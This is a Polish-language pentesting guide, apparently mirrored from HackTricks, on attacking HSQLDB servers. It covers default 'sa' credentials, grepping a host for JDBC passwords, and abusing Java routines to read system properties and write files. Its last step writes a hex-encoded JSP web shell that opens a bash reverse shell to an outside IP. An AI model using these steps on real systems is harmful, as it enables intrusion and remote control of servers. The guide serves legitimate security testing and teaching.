mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
70 lines
3.3 KiB
Markdown
70 lines
3.3 KiB
Markdown
# 9001 - Pentesting HSQLDB
|
|
|
|
{{#include ../banners/hacktricks-training.md}}
|
|
|
|
## Podstawowe informacje
|
|
|
|
**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** jest wiodącym systemem relacyjnej bazy danych SQL napisanym w Javie. Oferuje mały, szybki, wielowątkowy i transakcyjny silnik bazy danych z tabelami w pamięci i na dysku oraz obsługuje tryby osadzone i serwerowe.
|
|
|
|
**Domyślny port:** 9001
|
|
```text
|
|
9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
|
|
```
|
|
## Domyślne ustawienia
|
|
|
|
Zauważ, że domyślnie ta usługa prawdopodobnie działa w pamięci lub jest powiązana z localhost. Jeśli ją znalazłeś, prawdopodobnie wykorzystałeś inną usługę i szukasz podwyższenia uprawnień.
|
|
|
|
Domyślne dane logowania to zazwyczaj `sa` z pustym hasłem.
|
|
|
|
Jeśli wykorzystałeś inną usługę, przeszukaj możliwe dane logowania za pomocą
|
|
```text
|
|
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
|
|
```
|
|
Zauważ nazwę bazy danych - będziesz jej potrzebować do połączenia.
|
|
|
|
## Zbieranie informacji
|
|
|
|
Połącz się z instancją DB, pobierając [HSQLDB](https://sourceforge.net/projects/hsqldb/files/) i rozpakowując `hsqldb/lib/hsqldb.jar`. Uruchom aplikację GUI \(eww\) używając `java -jar hsqldb.jar` i połącz się z instancją używając odkrytych/słabych poświadczeń.
|
|
|
|
Zauważ, że adres URL połączenia będzie wyglądał mniej więcej tak dla systemu zdalnego: `jdbc:hsqldb:hsql://ip/DBNAME`.
|
|
|
|
## Sztuczki
|
|
|
|
### Routines języka Java
|
|
|
|
Możemy wywoływać statyczne metody klasy Java z HSQLDB używając Routines języka Java. Zauważ, że wywoływana klasa musi być w classpath aplikacji.
|
|
|
|
JRT mogą być `funkcjami` lub `procedurami`. Funkcje mogą być wywoływane za pomocą instrukcji SQL, jeśli metoda Java zwraca jedną lub więcej zmiennych prymitywnych zgodnych z SQL. Są wywoływane za pomocą instrukcji `VALUES`.
|
|
|
|
Jeśli metoda Java, którą chcemy wywołać, zwraca void, musimy użyć procedury wywołanej za pomocą instrukcji `CALL`.
|
|
|
|
### Odczytywanie właściwości systemu Java
|
|
|
|
Utwórz funkcję:
|
|
```text
|
|
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
|
|
DETERMINISTIC NO SQL
|
|
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
|
|
```
|
|
Wykonaj funkcję:
|
|
```text
|
|
VALUES(getsystemproperty('user.name'))
|
|
```
|
|
Możesz znaleźć [listę właściwości systemowych tutaj](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).
|
|
|
|
### Zapisz zawartość do pliku
|
|
|
|
Możesz użyć `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` gadżetu Java znajdującego się w JDK \(automatycznie załadowanego do ścieżki klas aplikacji\), aby zapisać elementy zakodowane w formacie hex na dysku za pomocą niestandardowej procedury. **Zauważ maksymalny rozmiar 1024 bajtów**.
|
|
|
|
Utwórz procedurę:
|
|
```text
|
|
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
|
|
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
|
|
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
|
|
```
|
|
Wykonaj procedurę:
|
|
```text
|
|
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
|
|
```
|
|
{{#include ../banners/hacktricks-training.md}}
|